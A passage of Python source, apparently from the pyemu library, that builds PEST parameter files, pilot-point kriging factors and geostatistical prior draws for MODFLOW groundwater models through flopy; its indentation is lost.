if self.m.sfr.reachinput:
# if include_temporal_pars:
# raise NotImplementedError("temporal pars is not set up for reach data style")
df = pyemu.gw_utils.setup_sfr_reach_parameters(self.m, par_cols=par_cols)
if df.empty:
warnings.warn("No sfr reach parameters have been set up", PyemuWarning)
else:
self.tpl_files.append("sfr_reach_pars.dat.tpl")
self.in_files.append("sfr_reach_pars.dat")
reach_pars = True
par_dfs["sfr"].append(df)
if len(par_dfs["sfr"]) > 0:
self.par_dfs["sfr"] = pd.concat(par_dfs["sfr"])
self.frun_pre_lines.append(
"pyemu.gw_utils.apply_sfr_parameters(seg_pars={0}, reach_pars={1})".format(seg_pars, reach_pars))
else:
warnings.warn("No sfr parameters have been set up!", PyemuWarning)
def _setup_hfb_pars(self):
"""setup non-mult parameters for hfb (yuck!)
"""
if self.m.hfb6 is None:
self.logger.lraise("couldn't find hfb pak")
tpl_file, df = pyemu.gw_utils.write_hfb_template(self.m)
self.in_files.append(os.path.split(tpl_file.replace(".tpl", ""))[-1])
self.tpl_files.append(os.path.split(tpl_file)[-1])
self.par_dfs["hfb"] = df
def _setup_mult_dirs(self):
""" setup the directories to use for multiplier parameterization. Directories
are make within the PstFromFlopyModel.m.model_ws directory
"""
# setup dirs to hold the original and multiplier model input quantities
set_dirs = []
# if len(self.pp_props) > 0 or len(self.zone_props) > 0 or \
# len(self.grid_props) > 0:
if self.pp_props is not None or \
self.zone_props is not None or \
self.grid_props is not None or \
self.const_props is not None or \
self.kl_props is not None:
set_dirs.append(self.arr_org)
set_dirs.append(self.arr_mlt)
# if len(self.bc_props) > 0:
if len(self.temporal_list_props) > 0 or len(self.spatial_list_props) > 0:
set_dirs.append(self.list_org)
if len(self.spatial_list_props):
set_dirs.append(self.list_mlt)
for d in set_dirs:
d = os.path.join(self.m.model_ws, d)
self.log("setting up '{0}' dir".format(d))
if os.path.exists(d):
if self.remove_existing:
shutil.rmtree(d, onerror=remove_readonly)
else:
raise Exception("dir '{0}' already exists".
format(d))
os.mkdir(d)
self.log("setting up '{0}' dir".format(d))
def _setup_model(self, model, org_model_ws, new_model_ws):
""" setup the flopy.mbase instance for use with multipler parameters.
Changes model_ws, sets external_path and writes new MODFLOW input
files
"""
split_new_mws = [i for i in os.path.split(new_model_ws) if len(i) > 0]
if len(split_new_mws) != 1:
self.logger.lraise("new_model_ws can only be 1 folder-level deep:{0}".
format(str(split_new_mws)))
if isinstance(model, str):
self.log("loading flopy model")
try:
import flopy
except:
raise Exception("from_flopy_model() requires flopy")
# prepare the flopy model
self.org_model_ws = org_model_ws
self.new_model_ws = new_model_ws
self.m = flopy.modflow.Modflow.load(model, model_ws=org_model_ws,
check=False, verbose=True, forgive=False)
self.log("loading flopy model")
else:
self.m = model
self.org_model_ws = str(self.m.model_ws)
self.new_model_ws = new_model_ws
self.log("updating model attributes")
self.m.array_free_format = True
self.m.free_format_input = True
self.m.external_path = '.'
self.log("updating model attributes")
if os.path.exists(new_model_ws):
if not self.remove_existing:
self.logger.lraise("'new_model_ws' already exists")
else:
self.logger.warn("removing existing 'new_model_ws")
shutil.rmtree(new_model_ws, onerror=pyemu.os_utils._remove_readonly)
time.sleep(1)
self.m.change_model_ws(new_model_ws, reset_external=True)
self.m.exe_name = self.m.exe_name.replace(".exe", '')
self.m.exe = self.m.version
self.log("writing new modflow input files")
self.m.write_input()
self.log("writing new modflow input files")
def _get_count(self, name):
""" get the latest counter for a certain parameter type.
"""
if name not in self.mlt_counter:
self.mlt_counter[name] = 1
c = 0
else:
c = self.mlt_counter[name]
self.mlt_counter[name] += 1
# print(name,c)
return c
def _prep_mlt_arrays(self):
""" prepare multipler arrays. Copies existing model input arrays and
writes generic (ones) multiplier arrays
"""
par_props = [self.pp_props, self.grid_props,
self.zone_props, self.const_props,
self.kl_props]
par_suffixs = [self.pp_suffix, self.gr_suffix,
self.zn_suffix, self.cn_suffix,
self.kl_suffix]
# Need to remove props and suffixes for which no info was provided (e.g. still None)
del_idx = []
for i, cp in enumerate(par_props):
if cp is None:
del_idx.append(i)
for i in del_idx[::-1]:
del (par_props[i])
del (par_suffixs[i])
mlt_dfs = []
for par_prop, suffix in zip(par_props, par_suffixs):
if len(par_prop) == 2:
if not isinstance(par_prop[0], list):
par_prop = [par_prop]
if len(par_prop) == 0:
continue
for pakattr, k_org in par_prop:
attr_name = pakattr.split('.')[1]
pak, attr = self._parse_pakattr(pakattr)
ks = np.arange(self.m.nlay)
if isinstance(attr, flopy.utils.Transient2d):
ks = np.arange(self.m.nper)
try:
k_parse = self._parse_k(k_org, ks)
except Exception as e:
self.logger.lraise("error parsing k {0}:{1}".
format(k_org, str(e)))
org, mlt, mod, layer = [], [], [], []
c = self._get_count(attr_name)
mlt_prefix = "{0}{1}".format(attr_name, c)
mlt_name = os.path.join(self.arr_mlt, "{0}.dat{1}"
.format(mlt_prefix, suffix))
for k in k_parse:
# horrible kludge to avoid passing int64 to flopy
# this gift may give again...
if type(k) is np.int64:
k = int(k)
if isinstance(attr, flopy.utils.Util2d):
fname = self._write_u2d(attr)
layer.append(k)
elif isinstance(attr, flopy.utils.Util3d):
fname = self._write_u2d(attr[k])
layer.append(k)
elif isinstance(attr, flopy.utils.Transient2d):
fname = self._write_u2d(attr.transient_2ds[k])
layer.append(0) # big assumption here
mod.append(os.path.join(self.m.external_path, fname))
mlt.append(mlt_name)
org.append(os.path.join(self.arr_org, fname))
df = pd.DataFrame({"org_file": org, "mlt_file": mlt, "model_file": mod, "layer": layer})
df.loc[:, "suffix"] = suffix
df.loc[:, "prefix"] = mlt_prefix
df.loc[:, "attr_name"] = attr_name
mlt_dfs.append(df)
if len(mlt_dfs) > 0:
mlt_df = pd.concat(mlt_dfs, ignore_index=True)
return mlt_df
def _write_u2d(self, u2d):
""" write a flopy.utils.Util2D instance to an ASCII text file using the
Util2D filename
"""
filename = os.path.split(u2d.filename)[-1]
np.savetxt(os.path.join(self.m.model_ws, self.arr_org, filename),
u2d.array, fmt="%15.6E")
return filename
def _write_const_tpl(self, name, tpl_file, zn_array):
""" write a template file a for a constant (uniform) multiplier parameter
"""
parnme = []
with open(os.path.join(self.m.model_ws, tpl_file), 'w') as f:
f.write("ptf ~\n")
for i in range(self.m.nrow):
for j in range(self.m.ncol):
if zn_array[i, j] < 1:
pname = " 1.0 "
else:
pname = "{0}{1}".format(name, self.cn_suffix)
if len(pname) > 12:
self.logger.warn("zone pname too long for pest:{0}". \
format(pname))
parnme.append(pname)
pname = " ~ {0} ~".format(pname)
f.write(pname)
f.write("\n")
df = pd.DataFrame({"parnme": parnme}, index=parnme)
# df.loc[:,"pargp"] = "{0}{1}".format(self.cn_suffixname)
df.loc[:, "pargp"] = "{0}_{1}".format(self.cn_suffix.replace('_', ''), name)
df.loc[:, "tpl"] = tpl_file
return df
def _write_grid_tpl(self, name, tpl_file, zn_array):
""" write a template file a for grid-based multiplier parameters
"""
parnme, x, y = [], [], []
with open(os.path.join(self.m.model_ws, tpl_file), 'w') as f:
f.write("ptf ~\n")
for i in range(self.m.nrow):
for j in range(self.m.ncol):
if zn_array[i, j] < 1:
pname = ' 1.0 '
else:
pname = "{0}{1:03d}{2:03d}".format(name, i, j)
if len(pname) > 12:
self.logger.warn("grid pname too long for pest:{0}". \
format(pname))
parnme.append(pname)
pname = ' ~ {0} ~ '.format(pname)
x.append(self.m.sr.xcentergrid[i, j])
y.append(self.m.sr.ycentergrid[i, j])
f.write(pname)
f.write("\n")
df = pd.DataFrame({"parnme": parnme, "x": x, "y": y}, index=parnme)
df.loc[:, "pargp"] = "{0}{1}".format(self.gr_suffix.replace('_', ''), name)
df.loc[:, "tpl"] = tpl_file
return df
def _grid_prep(self):
""" prepare grid-based parameterizations
"""
if len(self.grid_props) == 0:
return
if self.grid_geostruct is None:
self.logger.warn("grid_geostruct is None," \
" using ExpVario with contribution=1 and a=(max(delc,delr)*10")
dist = 10 * float(max(self.m.dis.delr.array.max(),
self.m.dis.delc.array.max()))
v = pyemu.geostats.ExpVario(contribution=1.0, a=dist)
self.grid_geostruct = pyemu.geostats.GeoStruct(variograms=v, name="grid_geostruct", transform="log")
def _pp_prep(self, mlt_df):
""" prepare pilot point based parameterization
"""
if len(self.pp_props) == 0:
return
if self.pp_space is None:
self.logger.warn("pp_space is None, using 10...\n")
self.pp_space = 10
if self.pp_geostruct is None:
self.logger.warn("pp_geostruct is None," \
" using ExpVario with contribution=1 and a=(pp_space*max(delr,delc))")
pp_dist = self.pp_space * float(max(self.m.dis.delr.array.max(),
self.m.dis.delc.array.max()))
v = pyemu.geostats.ExpVario(contribution=1.0, a=pp_dist)
self.pp_geostruct = pyemu.geostats.GeoStruct(variograms=v, name="pp_geostruct", transform="log")
pp_df = mlt_df.loc[mlt_df.suffix == self.pp_suffix, :]
layers = pp_df.layer.unique()
layers.sort()
pp_dict = {l: list(pp_df.loc[pp_df.layer == l, "prefix"].unique()) for l in layers}
# big assumption here - if prefix is listed more than once, use the lowest layer index
pp_dict_sort = {}
for i, l in enumerate(layers):
p = set(pp_dict[l])
pl = list(p)
pl.sort()
pp_dict_sort[l] = pl
for ll in layers[i + 1:]:
pp = set(pp_dict[ll])
d = list(pp - p)
d.sort()
pp_dict_sort[ll] = d
pp_dict = pp_dict_sort
pp_array_file = {p: m for p, m in zip(pp_df.prefix, pp_df.mlt_file)}
self.logger.statement("pp_dict: {0}".format(str(pp_dict)))
self.log("calling setup_pilot_point_grid()")
if self.use_pp_zones:
# check if k_zone_dict is a dictionary of dictionaries
if np.all([isinstance(v, dict) for v in self.k_zone_dict.values()]):
ib = {p.split('.')[-1]: k_dict for p, k_dict in self.k_zone_dict.items()}
for attr in pp_df.attr_name.unique():
if attr not in [p.split('.')[-1] for p in ib.keys()]:
if 'general_zn' not in ib.keys():
warnings.warn("Dictionary of dictionaries passed as zones, {0} not in keys: {1}. "
"Will use ibound for zones".format(attr, ib.keys()), PyemuWarning)
else:
self.logger.statement(
"Dictionary of dictionaries passed as pp zones, "
"using 'general_zn' for {0}".format(attr))
if 'general_zn' not in ib.keys():
ib['general_zn'] = {k: self.m.bas6.ibound[k].array for k in range(self.m.nlay)}
else:
ib = {'general_zn': self.k_zone_dict}
else:
ib = {}
for k in range(self.m.nlay):
a = self.m.bas6.ibound[k].array.copy()
a[a > 0] = 1
ib[k] = a
for k, i in ib.items():
if np.any(i < 0):
u, c = np.unique(i[i > 0], return_counts=True)
counts = dict(zip(u, c))
mx = -1.0e+10
imx = None
for u, c in counts.items():
if c > mx:
mx = c
imx = u
self.logger.warn("resetting negative ibound values for PP zone"+ \
"array in layer {0} : {1}".format(k+1, u))
i[i<0] = u
ib[k] = i
ib = {'general_zn': ib}
pp_df = pyemu.pp_utils.setup_pilotpoints_grid(self.m,
ibound=ib,
use_ibound_zones=self.use_pp_zones,
prefix_dict=pp_dict,
every_n_cell=self.pp_space,
pp_dir=self.m.model_ws,
tpl_dir=self.m.model_ws,
shapename=os.path.join(
self.m.model_ws, "pp.shp"))
self.logger.statement("{0} pilot point parameters created".
format(pp_df.shape[0]))
self.logger.statement("pilot point 'pargp':{0}".
format(','.join(pp_df.pargp.unique())))
self.log("calling setup_pilot_point_grid()")
# calc factors for each layer
pargp = pp_df.pargp.unique()
pp_dfs_k = {}
fac_files = {}
pp_processed = set()
pp_df.loc[:, "fac_file"] = np.NaN
for pg in pargp:
ks = pp_df.loc[pp_df.pargp == pg, "k"].unique()
if len(ks) == 0:
self.logger.lraise("something is wrong in fac calcs for par group {0}".format(pg))
if len(ks) == 1:
if np.all([isinstance(v, dict) for v in ib.values()]): # check is dict of dicts
if np.any([pg.startswith(p) for p in ib.keys()]):
p = next(p for p in ib.keys() if pg.startswith(p))
# get dict relating to parameter prefix
ib_k = ib[p][ks[0]]
else:
p = 'general_zn'
ib_k = ib[p][ks[0]]
else:
ib_k = ib[ks[0]]
if len(ks) != 1: # TODO
# self.logger.lraise("something is wrong in fac calcs for par group {0}".format(pg))
self.logger.warn("multiple k values for {0},forming composite zone array...".format(pg))
ib_k = np.zeros((self.m.nrow, self.m.ncol))
for k in ks:
t = ib["general_zn"][k].copy()
t[t < 1] = 0
ib_k[t > 0] = t[t > 0]
k = int(ks[0])
kattr_id = "{}_{}".format(k, p)
kp_id = "{}_{}".format(k, pg)
if kp_id not in pp_dfs_k.keys():
self.log("calculating factors for p={0}, k={1}".format(pg, k))
fac_file = os.path.join(self.m.model_ws, "pp_k{0}.fac".format(kattr_id))
var_file = fac_file.replace(".fac", ".var.dat")
pp_df_k = pp_df.loc[pp_df.pargp == pg]
if kattr_id not in pp_processed:
self.logger.statement("saving krige variance file:{0}"
.format(var_file))
self.logger.statement("saving krige factors file:{0}"
.format(fac_file))
ok_pp = pyemu.geostats.OrdinaryKrige(self.pp_geostruct, pp_df_k)
ok_pp.calc_factors_grid(self.m.sr, var_filename=var_file, zone_array=ib_k, num_threads=10)
ok_pp.to_grid_factors_file(fac_file)
pp_processed.add(kattr_id)
fac_files[kp_id] = fac_file
self.log("calculating factors for p={0}, k={1}".format(pg, k))
pp_dfs_k[kp_id] = pp_df_k
for kp_id, fac_file in fac_files.items():
k = int(kp_id.split('_')[0])
pp_prefix = kp_id.split('_', 1)[-1]
# pp_files = pp_df.pp_filename.unique()
fac_file = os.path.split(fac_file)[-1]
# pp_prefixes = pp_dict[k]
# for pp_prefix in pp_prefixes:
self.log("processing pp_prefix:{0}".format(pp_prefix))
if pp_prefix not in pp_array_file.keys():
self.logger.lraise("{0} not in self.pp_array_file.keys()".
format(pp_prefix, ','.
join(pp_array_file.keys())))
out_file = os.path.join(self.arr_mlt, os.path.split(pp_array_file[pp_prefix])[-1])
pp_files = pp_df.loc[pp_df.pp_filename.apply(
lambda x:
os.path.split(x)[-1].split(
'.')[0] == "{0}pp".format(pp_prefix)), 'pp_filename']
if pp_files.unique().shape[0] != 1:
self.logger.lraise("wrong number of pp_files found:{0}".format(','.join(pp_files)))
pp_file = os.path.split(pp_files.iloc[0])[-1]
pp_df.loc[pp_df.pargp == pp_prefix, "fac_file"] = fac_file
pp_df.loc[pp_df.pargp == pp_prefix, "pp_file"] = pp_file
pp_df.loc[pp_df.pargp == pp_prefix, "out_file"] = out_file
pp_df.loc[:, "pargp"] = pp_df.pargp.apply(lambda x: "pp_{0}".format(x))
out_files = mlt_df.loc[mlt_df.mlt_file.
apply(lambda x: x.endswith(self.pp_suffix)), "mlt_file"]
# mlt_df.loc[:,"fac_file"] = np.NaN
# mlt_df.loc[:,"pp_file"] = np.NaN
for out_file in out_files:
pp_df_pf = pp_df.loc[pp_df.out_file == out_file, :]
fac_files = pp_df_pf.fac_file
if fac_files.unique().shape[0] != 1:
self.logger.lraise("wrong number of fac files:{0}".format(str(fac_files.unique())))
fac_file = fac_files.iloc[0]
pp_files = pp_df_pf.pp_file
if pp_files.unique().shape[0] != 1:
self.logger.lraise("wrong number of pp files:{0}".format(str(pp_files.unique())))
pp_file = pp_files.iloc[0]
mlt_df.loc[mlt_df.mlt_file == out_file, "fac_file"] = fac_file
mlt_df.loc[mlt_df.mlt_file == out_file, "pp_file"] = pp_file
self.par_dfs[self.pp_suffix] = pp_df
mlt_df.loc[mlt_df.suffix == self.pp_suffix, "tpl_file"] = np.NaN
def _kl_prep(self, mlt_df):
""" prepare KL based parameterizations
"""
if len(self.kl_props) == 0:
return
if self.kl_geostruct is None:
self.logger.warn("kl_geostruct is None," \
" using ExpVario with contribution=1 and a=(10.0*max(delr,delc))")
kl_dist = 10.0 * float(max(self.m.dis.delr.array.max(),
self.m.dis.delc.array.max()))
v = pyemu.geostats.ExpVario(contribution=1.0, a=kl_dist)
self.kl_geostruct = pyemu.geostats.GeoStruct(variograms=v, name="kl_geostruct", transform="log")
kl_df = mlt_df.loc[mlt_df.suffix == self.kl_suffix, :]
layers = kl_df.layer.unique()
# kl_dict = {l:list(kl_df.loc[kl_df.layer==l,"prefix"].unique()) for l in layers}
# big assumption here - if prefix is listed more than once, use the lowest layer index
# for i,l in enumerate(layers):
# p = set(kl_dict[l])
# for ll in layers[i+1:]:
# pp = set(kl_dict[ll])
# d = pp - p
# kl_dict[ll] = list(d)
kl_prefix = list(kl_df.loc[:, "prefix"])
kl_array_file = {p: m for p, m in zip(kl_df.prefix, kl_df.mlt_file)}
self.logger.statement("kl_prefix: {0}".format(str(kl_prefix)))
fac_file = os.path.join(self.m.model_ws, "kl.fac")
self.log("calling kl_setup() with factors file {0}".format(fac_file))
kl_df = kl_setup(self.kl_num_eig, self.m.sr, self.kl_geostruct, kl_prefix,
factors_file=fac_file, basis_file=fac_file + ".basis.jcb",
tpl_dir=self.m.model_ws)
self.logger.statement("{0} kl parameters created".
format(kl_df.shape[0]))
self.logger.statement("kl 'pargp':{0}".
format(','.join(kl_df.pargp.unique())))
self.log("calling kl_setup() with factors file {0}".format(fac_file))
kl_mlt_df = mlt_df.loc[mlt_df.suffix == self.kl_suffix]
for prefix in kl_df.prefix.unique():
prefix_df = kl_df.loc[kl_df.prefix == prefix, :]
in_file = os.path.split(prefix_df.loc[:, "in_file"].iloc[0])[-1]
assert prefix in mlt_df.prefix.values, "{0}:{1}".format(prefix, mlt_df.prefix)
mlt_df.loc[mlt_df.prefix == prefix, "pp_file"] = in_file
mlt_df.loc[mlt_df.prefix == prefix, "fac_file"] = os.path.split(fac_file)[-1]
print(kl_mlt_df)
mlt_df.loc[mlt_df.suffix == self.kl_suffix, "tpl_file"] = np.NaN
self.par_dfs[self.kl_suffix] = kl_df
# calc factors for each layer
def _setup_array_pars(self):
""" main entry point for setting up array multipler parameters
"""
mlt_df = self._prep_mlt_arrays()
if mlt_df is None:
return
mlt_df.loc[:, "tpl_file"] = mlt_df.mlt_file.apply(lambda x: os.path.split(x)[-1] + ".tpl")
# mlt_df.loc[mlt_df.tpl_file.apply(lambda x:pd.notnull(x.pp_file)),"tpl_file"] = np.NaN
mlt_files = mlt_df.mlt_file.unique()
# for suffix,tpl_file,layer,name in zip(self.mlt_df.suffix,
# self.mlt_df.tpl,self.mlt_df.layer,
# self.mlt_df.prefix):
par_dfs = {}
for mlt_file in mlt_files:
suffixes = mlt_df.loc[mlt_df.mlt_file == mlt_file, "suffix"]
if suffixes.unique().shape[0] != 1:
self.logger.lraise("wrong number of suffixes for {0}" \
.format(mlt_file))
suffix = suffixes.iloc[0]
tpl_files = mlt_df.loc[mlt_df.mlt_file == mlt_file, "tpl_file"]
if tpl_files.unique().shape[0] != 1:
self.logger.lraise("wrong number of tpl_files for {0}" \
.format(mlt_file))
tpl_file = tpl_files.iloc[0]
layers = mlt_df.loc[mlt_df.mlt_file == mlt_file, "layer"]
# if layers.unique().shape[0] != 1:
# self.logger.lraise("wrong number of layers for {0}"\
# .format(mlt_file))
layer = layers.iloc[0]
names = mlt_df.loc[mlt_df.mlt_file == mlt_file, "prefix"]
if names.unique().shape[0] != 1:
self.logger.lraise("wrong number of names for {0}" \
.format(mlt_file))
name = names.iloc[0]
attr_names = mlt_df.loc[mlt_df.mlt_file == mlt_file, "attr_name"]
if attr_names.unique().shape[0] != 1:
self.logger.lraise("wrong number of attr_names for {0}".format(mlt_file))
attr_name = attr_names.iloc[0]
# ib = self.k_zone_dict[layer]
df = None
if suffix == self.cn_suffix:
self.log("writing const tpl:{0}".format(tpl_file))
# df = self.write_const_tpl(name,tpl_file,self.m.bas6.ibound[layer].array)
try:
df = write_const_tpl(name, os.path.join(self.m.model_ws, tpl_file), self.cn_suffix,
self.m.bas6.ibound[layer].array, (self.m.nrow, self.m.ncol), self.m.sr)
except Exception as e:
self.logger.lraise("error writing const template: {0}".format(str(e)))
self.log("writing const tpl:{0}".format(tpl_file))
elif suffix == self.gr_suffix:
self.log("writing grid tpl:{0}".format(tpl_file))
# df = self.write_grid_tpl(name,tpl_file,self.m.bas6.ibound[layer].array)
try:
df = write_grid_tpl(name, os.path.join(self.m.model_ws, tpl_file), self.gr_suffix,
self.m.bas6.ibound[layer].array, (self.m.nrow, self.m.ncol), self.m.sr)
except Exception as e:
self.logger.lraise("error writing grid template: {0}".format(str(e)))
self.log("writing grid tpl:{0}".format(tpl_file))
elif suffix == self.zn_suffix:
self.log("writing zone tpl:{0}".format(tpl_file))
if np.all([isinstance(v, dict) for v in self.k_zone_dict.values()]): # check is dict of dicts
if attr_name in [p.split('.')[-1] for p in self.k_zone_dict.keys()]:
k_zone_dict = next(k_dict for p, k_dict in self.k_zone_dict.items()
if p.split('.')[-1] == attr_name) # get dict relating to parameter prefix
else:
assert 'general_zn' in self.k_zone_dict.keys(), \
"Neither {0} nor 'general_zn' are in k_zone_dict keys: {1}".format(attr_name,
self.k_zone_dict.keys())
k_zone_dict = self.k_zone_dict['general_zn']
else:
k_zone_dict = self.k_zone_dict
# df = self.write_zone_tpl(self.m, name, tpl_file, self.k_zone_dict[layer], self.zn_suffix, self.logger)
try:
df = write_zone_tpl(name, os.path.join(self.m.model_ws, tpl_file), self.zn_suffix,
k_zone_dict[layer], (self.m.nrow, self.m.ncol), self.m.sr)
except Exception as e:
self.logger.lraise("error writing zone template: {0}".format(str(e)))
self.log("writing zone tpl:{0}".format(tpl_file))
if df is None:
continue
if suffix not in par_dfs:
par_dfs[suffix] = [df]
else:
par_dfs[suffix].append(df)
for suf, dfs in par_dfs.items():
self.par_dfs[suf] = pd.concat(dfs)
if self.pp_suffix in mlt_df.suffix.values:
self.log("setting up pilot point process")
self._pp_prep(mlt_df)
self.log("setting up pilot point process")
if self.gr_suffix in mlt_df.suffix.values:
self.log("setting up grid process")
self._grid_prep()
self.log("setting up grid process")
if self.kl_suffix in mlt_df.suffix.values:
self.log("setting up kl process")
self._kl_prep(mlt_df)
self.log("setting up kl process")
mlt_df.to_csv(os.path.join(self.m.model_ws, "arr_pars.csv"))
ones = np.ones((self.m.nrow, self.m.ncol))
for mlt_file in mlt_df.mlt_file.unique():
self.log("save test mlt array {0}".format(mlt_file))
np.savetxt(os.path.join(self.m.model_ws, mlt_file),
ones, fmt="%15.6E")
self.log("save test mlt array {0}".format(mlt_file))
tpl_files = mlt_df.loc[mlt_df.mlt_file == mlt_file, "tpl_file"]
if tpl_files.unique().shape[0] != 1:
self.logger.lraise("wrong number of tpl_files for {0}" \
.format(mlt_file))
tpl_file = tpl_files.iloc[0]
if pd.notnull(tpl_file):
self.tpl_files.append(tpl_file)
self.in_files.append(mlt_file)
# for tpl_file,mlt_file in zip(mlt_df.tpl_file,mlt_df.mlt_file):
# if pd.isnull(tpl_file):
# continue
# self.tpl_files.append(tpl_file)
# self.in_files.append(mlt_file)
os.chdir(self.m.model_ws)
try:
apply_array_pars()
except Exception as e:
os.chdir("..")
self.logger.lraise("error test running apply_array_pars():{0}".
format(str(e)))
os.chdir("..")
line = "pyemu.helpers.apply_array_pars()\n"
self.logger.statement("forward_run line:{0}".format(line))
self.frun_pre_lines.append(line)
def _setup_observations(self):
""" main entry point for setting up observations
"""
obs_methods = [self._setup_water_budget_obs, self._setup_hyd,
self._setup_smp, self._setup_hob, self._setup_hds,
self._setup_sfr_obs]
obs_types = ["mflist water budget obs", "hyd file",
"external obs-sim smp files", "hob", "hds", "sfr"]
self.obs_dfs = {}
for obs_method, obs_type in zip(obs_methods, obs_types):
self.log("processing obs type {0}".format(obs_type))
obs_method()
self.log("processing obs type {0}".format(obs_type))
def draw(self, num_reals=100, sigma_range=6,use_specsim=False, scale_offset=True):
""" draw from the geostatistically-implied parameter covariance matrix
Args:
num_reals (`int`): number of realizations to generate. Default is 100
sigma_range (`float`): number of standard deviations represented by
the parameter bounds. Default is 6.
use_specsim (`bool`): flag to use spectral simulation for grid-based
parameters. Requires a regular grid but is wicked fast. Default is False
scale_offset (`bool`, optional): flag to apply scale and offset to parameter
bounds when calculating variances - this is passed through to
`pyemu.Cov.from_parameter_data`. Default is True.
Note:
operates on parameters by groups to avoid having to construct a very large
covariance matrix for problems with more the 30K parameters.
uses `helpers.geostatitical_draw()`
Returns:
`pyemu.ParameterEnsemble`: The realized parameter ensemble
"""
self.log("drawing realizations")
struct_dict = {}
gr_par_pe = None
if self.pp_suffix in self.par_dfs.keys():
pp_df = self.par_dfs[self.pp_suffix]
pp_dfs = []
for pargp in pp_df.pargp.unique():
gp_df = pp_df.loc[pp_df.pargp == pargp, :]
p_df = gp_df.drop_duplicates(subset="parnme")
pp_dfs.append(p_df)
# pp_dfs = [pp_df.loc[pp_df.pargp==pargp,:].copy() for pargp in pp_df.pargp.unique()]
struct_dict[self.pp_geostruct] = pp_dfs
if self.gr_suffix in self.par_dfs.keys():
gr_df = self.par_dfs[self.gr_suffix]
if not use_specsim:
gr_dfs = []
for pargp in gr_df.pargp.unique():
gp_df = gr_df.loc[gr_df.pargp == pargp, :]
p_df = gp_df.drop_duplicates(subset="parnme")
gr_dfs.append(p_df)
# gr_dfs = [gr_df.loc[gr_df.pargp==pargp,:].copy() for pargp in gr_df.pargp.unique()]
struct_dict[self.grid_geostruct] = gr_dfs
else:
if not pyemu.geostats.SpecSim2d.grid_is_regular(self.m.dis.delr.array, self.m.dis.delc.array):
self.logger.lraise("draw() error: can't use spectral simulation with irregular grid")
gr_df.loc[:, "i"] = gr_df.parnme.apply(lambda x: int(x[-6:-3]))
gr_df.loc[:, "j"] = gr_df.parnme.apply(lambda x: int(x[-3:]))
if gr_df.i.max() > self.m.nrow - 1 or gr_df.i.min() < 0:
self.logger.lraise("draw(): error parsing grid par names for 'i' index")
if gr_df.j.max() > self.m.ncol - 1 or gr_df.j.min() < 0:
self.logger.lraise("draw(): error parsing grid par names for 'j' index")
self.log("spectral simulation for grid-scale pars")
ss = pyemu.geostats.SpecSim2d(delx=self.m.dis.delr.array, dely=self.m.dis.delc.array,
geostruct=self.grid_geostruct)
gr_par_pe = ss.grid_par_ensemble_helper(pst=self.pst, gr_df=gr_df, num_reals=num_reals,
sigma_range=sigma_range, logger=self.logger)
self.log("spectral simulation for grid-scale pars")
if "temporal_list" in self.par_dfs.keys():
bc_df = self.par_dfs["temporal_list"]
bc_df.loc[:, "y"] = 0
bc_df.loc[:, "x"] = bc_df.timedelta.apply(lambda x: x.days)
bc_dfs = []
for pargp in bc_df.pargp.unique():
gp_df = bc_df.loc[bc_df.pargp == pargp, :]
p_df = gp_df.drop_duplicates(subset="parnme")
# print(p_df)
bc_dfs.append(p_df)
# bc_dfs = [bc_df.loc[bc_df.pargp==pargp,:].copy() for pargp in bc_df.pargp.unique()]
struct_dict[self.temporal_list_geostruct] = bc_dfs
if "spatial_list" in self.par_dfs.keys():
bc_df = self.par_dfs["spatial_list"]
bc_dfs = []
for pargp in bc_df.pargp.unique():
gp_df = bc_df.loc[bc_df.pargp == pargp, :]
# p_df = gp_df.drop_duplicates(subset="parnme")
# print(p_df)
bc_dfs.append(gp_df)
struct_dict[self.spatial_list_geostruct] = bc_dfs
pe = geostatistical_draws(self.pst,struct_dict=struct_dict,num_reals=num_reals,
sigma_range=sigma_range,scale_offset=scale_offset)
if gr_par_pe is not None:
pe.loc[:, gr_par_pe.columns] = gr_par_pe.values
self.log("drawing realizations")
return pe
def build_prior(self, fmt="ascii", filename=None, droptol=None, chunk=None,
sigma_range=6):
""" build and optionally save the prior parameter covariance matrix.
Args:
fmt (`str`, optional): the format to save the cov matrix. Options are "ascii","binary","uncfile", "coo".
Default is "ascii". If "none" (lower case string, not None), then no file is created.
filename (`str`, optional): the filename to save the prior cov matrix to. If None, the name is formed using
model nam_file name. Default is None.
droptol (`float`, optional): tolerance for dropping near-zero values when writing compressed binary.
Default is None.
chunk (`int`, optional): chunk size to write in a single pass - for binary only. Default
is None (no chunking).
sigma_range (`float`): number of standard deviations represented by the parameter bounds. Default
is 6.
Returns:
`pyemu.Cov`: the full prior parameter covariance matrix, generated by processing parameters by
groups
"""
fmt = fmt.lower()
acc_fmts = ["ascii", "binary", "uncfile", "none", "coo"]
if fmt not in acc_fmts:
self.logger.lraise("unrecognized prior save 'fmt':{0}, options are: {1}".
format(fmt, ','.join(acc_fmts)))
self.log("building prior covariance matrix")
struct_dict = {}
if self.pp_suffix in self.par_dfs.keys():
pp_df = self.par_dfs[self.pp_suffix]
pp_dfs = []
for pargp in pp_df.pargp.unique():
gp_df = pp_df.loc[pp_df.pargp == pargp, :]
p_df = gp_df.drop_duplicates(subset="parnme")
pp_dfs.append(p_df)
# pp_dfs = [pp_df.loc[pp_df.pargp==pargp,:].copy() for pargp in pp_df.pargp.unique()]
struct_dict[self.pp_geostruct] = pp_dfs
if self.gr_suffix in self.par_dfs.keys():
gr_df = self.par_dfs[self.gr_suffix]
gr_dfs = []
for pargp in gr_df.pargp.unique():
gp_df = gr_df.loc[gr_df.pargp == pargp, :]
p_df = gp_df.drop_duplicates(subset="parnme")
gr_dfs.append(p_df)
# gr_dfs = [gr_df.loc[gr_df.pargp==pargp,:].copy() for pargp in gr_df.pargp.unique()]
struct_dict[self.grid_geostruct] = gr_dfs
if "temporal_list" in self.par_dfs.keys():
bc_df = self.par_dfs["temporal_list"]
bc_df.loc[:, "y"] = 0
bc_df.loc[:, "x"] = bc_df.timedelta.apply(lambda x: x.days)
bc_dfs = []
for pargp in bc_df.pargp.unique():
gp_df = bc_df.loc[bc_df.pargp == pargp, :]
p_df = gp_df.drop_duplicates(subset="parnme")
# print(p_df)
bc_dfs.append(p_df)
# bc_dfs = [bc_df.loc[bc_df.pargp==pargp,:].copy() for pargp in bc_df.pargp.unique()]
struct_dict[self.temporal_list_geostruct] = bc_dfs
if "spatial_list" in self.par_dfs.keys():
bc_df = self.par_dfs["spatial_list"]
bc_dfs = []
for pargp in bc_df.pargp.unique():
gp_df = bc_df.loc[bc_df.pargp == pargp, :]
# p_df = gp_df.drop_duplicates(subset="parnme")
# print(p_df)
bc_dfs.append(gp_df)
